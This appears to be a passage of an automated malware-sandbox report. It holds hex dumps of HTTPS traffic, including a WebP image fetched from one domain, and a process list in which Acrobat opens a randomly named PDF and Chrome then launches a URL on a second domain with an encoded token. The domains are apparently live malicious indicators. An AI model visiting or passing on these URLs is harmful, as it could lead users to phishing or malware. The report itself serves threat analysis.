                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 90 3e 18 90 4f 29 23 dd 41 02 4d 11 70 4d 33 a1 f0 d8 3e 79 0c 65 9d 44 1b 6e 86 fe 08 1f fc fd ca 14 29 4d 1a 7f 6b 4c a0 ec 00 1a 03 4d a8 e1 12 5c d2 0e a4 6f 5d ed 74 84 a7 33 ea 22 df f2 75 27 06 be fb 45 6f f9 a5 28 f5 06 7c 56 b8 1d b1 c3 fa 37 84 25 2b 71 7b 77 92 d5 f2 16 9a c9 95 0d 39 44 a9 b8 0d c6 68 3a 0a d0 1b 5f 6b 8e ff ea dc 61 a7 ad 72 35 f0 86 b1 de 6c e6 1c 03 a4 0a 0b bc a9 6a fa b6 11 5e b8 97 39 e7 0f e1 50 b5 fa 1f 06 2d 31 60 05 13 24 ac 78 91 50 79 8d 71 41 bd f6 f0 ad 6c 88 57 71 60 f5 87 d7 4b aa 85 d2 49 b0 28 99 92 25 f2 68 13 61 de 65 aa 2e 9e e0 0b cb 7d f8 d6 93 01 18 1b 17 47 6a 54 4d 0d f4 25 b5 b4 d9 c3 76 96 d8 2e 53 be 5c 9a d2 cf 99 93 eb a5 14 61 f0 b1 08 e7 ff 76 fd 86 4d 9d f1 54 1a 02 56 a5 f4 ee 36 a7 bb db dd
                                                                                                          Data Ascii: >O)#AMpM3>yeDn)MkLM\o]t3"u'Eo(|V7%+q{w9Dh:_kar5lj^9P-1`$xPyqAlWq`KI(%hae.}GjTM%v.S\avMTV6


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          120192.168.2.450170104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:26 UTC464OUTGET /_next/static/media/m_13.99d105c0.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:27 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:27 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 11538
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-2d12"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 2
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:27 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41841acdc452-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:27 UTC873INData Raw: 52 49 46 46 0a 2d 00 00 57 45 42 50 56 50 38 20 fe 2c 00 00 30 14 01 9d 01 2a 00 02 00 02 3e 6d 32 92 46 a4 23 21 a1 2d 73 ba 80 80 0d 89 67 40 c4 a7 69 c7 6e 57 f9 df af ae 0f ea 25 17 f9 42 4a 37 57 e9 c2 16 fd 6b e2 cf 81 1a cf fa 07 2a ae 35 fd 0b fc c7 e6 ff f6 6f 44 ff 96 f0 ed f0 cf db bf 61 9f e9 df e5 be df 3d c0 3b e7 7f cf a5 8f f1 1f fa 9e 4d ff 46 be 25 fd 28 f6 75 fd 0a f5 ef cc 09 e9 3b f8 0f fc 9f e2 3f d4 f3 9e 7f 0e fd 9c e0 00 ec e6 84 57 7f 42 26 1b 5e ea 66 f6 ff e8 fe e0 a7 ed 1f 9c cf 8d fe bb ff 63 fc 3f 93 bf 91 7d 2b fb af f0 3f e3 39 78 7a a7 f9 7e 2e ff 8f 66 43 fc 4f d9 6f 40 7f 0f fa 87 f5 2f ff 51 c9 77 e6 fa 1e fd 83 8d 1e 5d 78 c4 f2 e9 1d 1f fd af d9 ef 22 7f 57 62 07 cd 5f 42 ba 5b 20 04 ad 45 59 74 43 6b 76 0f 28 34 f6
                                                                                                          Data Ascii: RIFF-WEBPVP8 ,0*>m2F#!-sg@inW%BJ7Wk*5oDa=;MF%(u;?WB&^fc?}+?9xz~.fCOo@/Qw]x"Wb_B[ EYtCkv(4
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: a5 a1 11 bc 5d af b1 c3 16 24 cf 24 f4 ce a0 43 25 da e8 6b 6d 66 db 90 84 fc d0 86 0f 2b 74 a9 a1 a9 03 d0 e5 e3 5a 6c dc d9 3d 07 40 30 8b 06 47 49 91 0a 29 74 06 01 70 aa 4a 32 67 dc e4 d1 51 14 91 00 1d 93 a2 37 74 06 ed 16 c6 23 00 b1 bf 65 12 76 45 19 ec 4c 9d b3 76 ab 8a 93 6a 07 a4 49 f2 0c ce 21 4b 2f e3 97 55 a5 5a cf c1 51 58 28 4c 14 21 05 db c1 81 bf ff 4f 19 4a 04 9e be 34 00 80 7f fd 17 e3 5b 93 e5 72 72 0b 94 8a 5c 46 a0 75 b8 d4 c9 c8 3e 56 ee ab f7 0c 10 8f 29 b6 73 ea 0f df f9 9b 90 10 fb c4 e2 b3 db 6e 6e 51 0d 24 5e 53 9c aa 7e 28 73 9d 5a 9f 90 34 04 09 47 d0 87 5b 33 97 86 fa 9e 85 6c 6a 0f 56 11 20 12 db 03 58 b9 00 5a dd 80 c8 89 e2 7a a7 35 47 15 e4 ba 95 18 cb c1 6a 36 51 8c 4c ba 9a 82 25 c4 97 e2 0d 9f 53 ec e8 22 52 38 e9 17
                                                                                                          Data Ascii: ]$$C%kmf+tZl=@0GI)tpJ2gQ7t#evELvjI!K/UZQX(L!OJ4[rr\Fu>V)snnQ$^S~(sZ4G[3ljV XZz5Gj6QL%S"R8
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: cc 24 ac a2 68 ba b6 b6 12 cb 4a a5 5a 3c 36 3b 52 88 fe 44 a6 1f 6d a4 4b 7e a3 fb 7e 47 3e ac 98 e0 70 69 ce 47 e3 67 74 a6 ea a4 43 f8 dc 7d ef 23 8e c5 bb d8 99 95 9c 14 73 9d 71 ae 4e 63 a9 57 f3 11 88 5c 80 19 d8 80 be 91 4b ba 33 00 fb 6b a0 c2 13 bb 59 3c 7f 3b cd 76 4c 57 6d ff e7 bf 46 e6 9e 6a d6 dc 6a ae ff 1e 46 ce 34 60 d2 0f ff aa 10 67 39 5a 34 56 b9 df 2e b3 3a 31 eb aa 62 44 e0 31 2a 96 ab af 25 4b 1a 28 7d a7 fe 7b ba b5 1e c9 4f aa 8c ce 69 82 00 4e 0a d6 aa 2d b1 d0 24 8d d4 50 9c 0b d0 87 a2 eb 41 52 83 1e 00 14 9d ae 1a 32 d6 c0 ef 73 bb 46 d5 5c ab 24 d2 0d 15 ec 62 62 e5 f0 fe 11 d9 9a be 5b 90 a3 e3 fe 36 de 12 cd 35 f1 0f d8 f8 8b fb 9b 23 7e 42 cc dd ee 2e ea ae b0 0b b1 f7 8a 40 00 21 c7 68 f1 a8 55 78 5b f0 59 c6 1e c0 57 a5
                                                                                                          Data Ascii: $hJZ<6;RDmK~~G>piGgtC}#sqNcW\K3kY<;vLWmFjjF4`g9Z4V.:1bD1*%K(}{OiN-$PAR2sF\$bb[65#~B.@!hUx[YW
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 9c 24 fd 98 d2 e7 54 c7 81 e6 1b d6 15 72 bf f6 1b 2b f3 23 2b dc 61 6a b3 d0 70 b0 c3 6c b0 c8 ec a4 d6 ce c7 1f 26 52 f5 c7 03 3f a0 4b 9e a3 3d c3 ee 74 20 96 47 59 25 72 8b 8e 06 8f 84 28 b8 68 37 1c b6 e1 6f 8a 3d 50 eb 27 87 56 e5 06 1a 8b bf 1c 72 d1 4d 23 8c f3 e6 4a f8 a6 f7 fc 01 de 90 7a 84 ed 86 84 dc 52 18 9c 01 69 a4 1a 73 16 9d da 81 33 f1 38 aa 0d 46 36 fa 6e a3 74 02 be 63 cc d4 ef ce 7d 5a ce 0c 7c a0 f6 bf 72 4c 25 b5 cc 2b 53 8b f4 26 fe 09 1d 1a e8 ab 5c 0f 80 9c 73 44 ee db 70 06 5c b6 47 34 6e 30 90 d6 d9 8e a2 2a b9 cd ee d6 4a 2c 8e ab 8e 74 07 c4 b6 e0 e0 07 8e 83 0e c8 11 7a 43 46 18 e4 bd 1a bf 8b e2 84 56 91 3a 38 4a 7f e2 64 bf b4 94 26 4a 12 a3 6c 18 64 cf 55 bf aa 02 39 8c f9 79 3a 2d 98 40 5b 6b 5c 59 78 e2 04 6d 78 93 2d
                                                                                                          Data Ascii: $Tr+#+ajpl&R?K=t GY%r(h7o=P'VrM#JzRis38F6ntc}Z|rL%+S&\sDp\G4n0*J,tzCFV:8Jd&JldU9y:-@[k\Yxmx-
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: aa d0 91 1d b4 36 87 d6 db e0 ea 3c 48 38 c3 9f 77 29 d8 87 6a eb 2d 72 ee 6e 6d 1c 31 a2 65 76 e4 3c 8f b5 67 30 08 be fe e8 b6 77 4a 72 a4 6a 4f e3 e6 4a 93 19 c0 94 5d 5c 40 85 ad d1 70 01 99 50 c1 b5 61 09 ae 7d b4 b2 d5 35 81 37 66 6b 51 ba 5b 54 6f dc 90 b2 48 79 b0 70 c2 22 8b f4 0a 92 15 18 7d e3 79 6b d4 35 67 59 ad af fc 93 36 1b 12 f9 ce c5 79 14 ea 25 20 e5 e1 bc 0a 9f bc 97 8b 2e 42 e4 3a e6 f1 22 cf bb d1 0d 00 24 9d 48 93 91 db cd a2 a2 ba 46 65 b0 7d 66 9b 87 3e d1 ae b1 c6 66 41 ed 49 36 19 70 26 62 e4 ba 5a 6c 4e 57 c6 59 3d a1 f3 4b 0c 95 14 ab 51 57 c9 2e 18 06 1e 9b b9 1c 08 25 be 37 cd 56 ac 76 3c 5d b1 31 04 6d 6e be ff bf 0d 04 9a 48 28 95 be 2f 51 57 d8 6b c7 05 de ea be c5 4b da ac d5 76 d3 e4 38 38 45 40 10 dc 12 1e cf 48 3a 72
                                                                                                          Data Ascii: 6<H8w)j-rnm1ev<g0wJrjOJ]\@pPa}57fkQ[ToHyp"}yk5gY6y% .B:"$HFe}f>fAI6p&bZlNWY=KQW.%7Vv<]1mnH(/QWkKv88E@H:r
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 20 81 c7 76 3e 6d e9 f4 78 bb b6 e8 3f cc 4b 77 9f 4a 99 4b 5b cb 4e af a4 d4 89 4b 4b e3 7b 94 9d 56 e7 e4 d7 a1 e4 01 96 44 2e eb ec 76 28 e4 0b 3a 50 20 c0 fc 4b 69 e2 30 a7 39 93 52 de 43 e2 70 9a e3 1b 08 91 30 fd 29 f8 05 09 90 97 64 6b 51 96 69 54 7b 10 f4 ef c3 24 46 9d ea 06 9e 59 50 8f 44 3c c0 ef 47 f4 bc 90 30 89 ba ed ce 82 96 d7 3d d7 73 11 cf 08 f0 96 e8 72 94 77 7e df 97 86 f9 d7 96 0a 00 7e 2c a7 fa 14 1e 21 fa c3 55 3d 54 41 68 5c 65 d3 08 40 95 33 93 4b 85 7b f5 f0 b3 a4 70 76 1f de fc 05 67 b2 29 e5 c3 c0 75 61 c2 b3 09 3a ee a6 a9 af 59 8c 74 8e 85 dd 58 69 30 a0 78 b7 65 28 e6 cb f7 60 11 40 54 a7 7a e6 31 4d 44 87 81 57 b7 9b bc b1 22 05 4b af a4 54 f3 ad 7b 60 6a bb 35 f3 32 31 5f bf a5 b2 b0 b8 9f 98 6d f5 61 b1 e7 de 12 63 74 3c
                                                                                                          Data Ascii: v>mx?KwJK[NKK{VD.v(:P Ki09RCp0)dkQiT{$FYPD<G0=srw~~,!U=TAh\e@3K{pvg)ua:YtXi0xe(`@Tz1MDW"KT{`j521_mact<
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: 3b 4a 2e f3 12 7f 71 f0 94 22 69 d9 31 00 cc 9e c7 db 0d 92 12 87 dd 24 6c cb 8c 8c 5e ce 68 a3 66 66 45 2c 45 99 dd 90 e2 bb 2d a3 bd 26 5a ae 53 c7 11 1c bd da 3b 05 c6 74 60 42 d1 f2 32 50 68 e6 c1 d9 96 98 b0 da e9 d4 aa 62 4f 85 9e 4b 40 c2 a1 29 f3 1f a6 b8 6a 9f dc c2 65 fb 5e 0b 66 35 e9 45 7b f2 bc 1a 72 d9 68 8e a1 e9 d8 72 66 a9 96 7c 3b 17 04 82 88 2a aa fd 99 61 5a 33 9e e2 2c c7 15 ed 99 6d 0f 42 83 ac c7 ac b0 18 76 22 12 50 61 3c 75 75 71 bd 54 ef 9d 4e 1f d0 26 d8 d9 64 26 b9 dd a8 43 55 e6 57 66 cf fd 2c 60 a4 9c 50 6e 33 eb 1c 8e e8 8e 07 33 90 52 46 d4 00 52 ed a2 2f bd 14 5e e3 41 c2 1c 52 fd aa 47 49 4c bf 08 5a fd 96 af 70 3d bb ff 8d 4b 8a 19 26 80 60 5d e1 be 34 40 05 c4 ff 70 48 85 93 d1 c3 10 7b 8e 3e 62 a7 ac 19 68 36 af dc c6
                                                                                                          Data Ascii: ;J.q"i1$l^hffE,E-&ZS;t`B2PhbOK@)je^f5E{rhrf|;*aZ3,mBv"Pa<uuqTN&d&CUWf,`Pn33RFR/^ARGILZp=K&`]4@pH{>bh6
                                                                                                          2025-01-06 11:09:27 UTC1369INData Raw: ac fc 5f 1d 18 66 23 6f 98 13 8c ef 65 ad c6 1e 73 87 fa 53 7e ac e5 50 e2 0e b6 87 83 0f 16 94 0d 27 2b 36 32 41 35 50 09 42 78 48 6d 82 84 ca 52 b2 7f 59 1d c4 45 42 d2 6d 4e 78 dc 3d 53 5a 5d e6 e4 37 89 08 c4 89 97 ad 4f 8b d6 bf c7 2a 64 c7 16 ad 1a 97 ef 07 5a 87 9e cf 9d e9 f6 18 dc 4a ca 39 57 68 2b 87 93 93 fa a7 07 a2 78 2f 47 bd a8 26 43 96 e8 bd 88 df ec 78 60 be e9 d4 39 38 19 60 e4 46 8f 69 95 3a 8c ac 95 45 5d a2 8d 03 45 c4 ab ad 7b 13 57 11 72 59 fe cf 77 b1 49 c1 6b b4 23 2d e8 6a 46 8e 2f ac fd 6b e6 29 eb 1a 8d da 55 8a 0e 74 e4 63 b5 f7 11 fa 1d fd 37 89 b5 b7 ee d9 72 24 b5 40 eb b3 1f f6 a6 18 ce 31 21 74 41 eb 1e df 2f 5e 3d 50 bf 6b 69 b7 f8 89 10 7b 33 dc c5 73 b8 c8 30 64 9d 0d 3d 66 ad e2 25 0f b2 5d 03 0b 97 21 fe 80 62 e6 c4
                                                                                                          Data Ascii: _f#oesS~P'+62A5PBxHmRYEBmNx=SZ]7O*dZJ9Wh+x/G&Cx`98`Fi:E]E{WrYwIk#-jF/k)Utc7r$@1!tA/^=Pki{3s0d=f%]!b
                                                                                                          2025-01-06 11:09:27 UTC1082INData Raw: 67 13 45 5e 0e c9 9c 4d 85 2a 69 89 dc 1e 5a d4 66 98 eb d7 28 85 af 38 c1 84 29 95 6c 58 d6 2c ec 04 e9 b6 c8 b1 1c f1 5a ad 3d a2 2f 23 77 bf 57 0b e1 75 b2 27 33 71 f4 61 97 79 56 e9 b2 c8 26 a6 7b 48 92 fc 59 ce 94 62 20 54 7b 44 7c 46 be 56 03 71 e8 2c 99 7c f6 34 2e ce 65 91 22 c4 cb 42 f3 8c 02 72 be dc a8 36 3a d2 72 c9 94 80 b0 de 87 c8 71 b1 c5 ff c3 5f 10 ad d1 ac 6f c7 81 35 33 39 b1 2b 61 e0 40 4b 78 4c 85 00 44 38 66 ec 5f 35 41 cf 0b e2 0e 60 13 26 13 c6 16 56 b1 e9 d8 70 fc 4c ce 44 d3 4e 00 9b 33 2e fb fb a0 8c 58 f5 34 f5 01 17 a7 7c b0 3b 0e e2 b8 7d 74 20 ee 1f 98 7d be 03 2d d5 b9 79 8f 97 97 91 cc 52 55 91 84 45 07 ba da 00 04 b6 69 68 44 0d c1 e4 ee 89 6e 09 2a 2a 89 32 a8 c8 3e 25 1f 56 da 06 c1 0e 85 79 fe 56 cf 58 f6 0c 85 ea 84
                                                                                                          Data Ascii: gE^M*iZf(8)lX,Z=/#wWu'3qayV&{HYb T{D|FVq,|4.e"Br6:rq_o539+a@KxLD8f_5A`&VpLDN3.X4|;}t }-yRUEihDn**2>%VyVX


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:06:06:21
                                                                                                          Start date:06/01/2025
                                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\AZfDGVWF68.pdf"
                                                                                                          Imagebase:0x7ff6bc1b0000
                                                                                                          File size:5'641'176 bytes
                                                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:06:06:22
                                                                                                          Start date:06/01/2025
                                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                          Imagebase:0x7ff74bb60000
                                                                                                          File size:3'581'912 bytes
                                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:06:06:22
                                                                                                          Start date:06/01/2025
                                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1556,i,2814437525766773916,2514006706851234816,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                          Imagebase:0x7ff74bb60000
                                                                                                          File size:3'581'912 bytes
                                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:06:06:46
                                                                                                          Start date:06/01/2025
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo="
                                                                                                          Imagebase:0x7ff76e190000
                                                                                                          File size:3'242'272 bytes
                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:10
                                                                                                          Start time:06:06:47
                                                                                                          Start date:06/01/2025
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1972,i,17501448836344422679,2360784714452452957,262144 /prefetch:8
                                                                                                          Imagebase:0x7ff76e190000
                                                                                                          File size:3'242'272 bytes
                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          No disassembly